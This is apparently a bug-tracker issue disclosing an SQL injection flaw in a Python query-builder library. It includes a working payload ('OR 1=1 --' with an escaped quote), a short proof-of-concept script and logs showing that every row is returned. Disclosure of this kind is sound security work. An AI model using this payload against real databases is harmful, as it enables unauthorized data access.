SQL injection possible #844
Description
Found the possibility to make an injection.
If the user input is like that:
Injection\\' OR 1=1 --
And you process it like that:
TABLE_NAME: str = "my_table"
INJECTION: str = "Injection\\' OR 1=1 -- "
table: Table = Table(TABLE_NAME)
query: QueryBuilder = Query.from_(table).select(table.star).where(Field("val0") == INJECTION)
sql: str = query.get_sql(quote_char=None)
connection.execute(sql)
All the table rows would be selected.
My test logs:
[2025-07-24, 15:06:30 UTC] {sql.py:814} INFO - Running statement: SELECT * FROM my_table WHERE val0='Injection\'' OR 1=1 -- ', parameters: None
[2025-07-24, 15:06:30 UTC] {sql.py:823} INFO - Rows affected: 4
...
The last message means 4 rows were selected (all that I have there)
P.S. quote char (and the defaullt double-quote) would not save you:
[2025-07-24, 15:24:09 UTC] {sql.py:814} INFO - Running statement: SELECT * FROM `my_table` WHERE `val0`='Injection\'' OR 1=1 -- ', parameters: None
[2025-07-24, 15:24:09 UTC] {sql.py:823} INFO - Rows affected: 4
...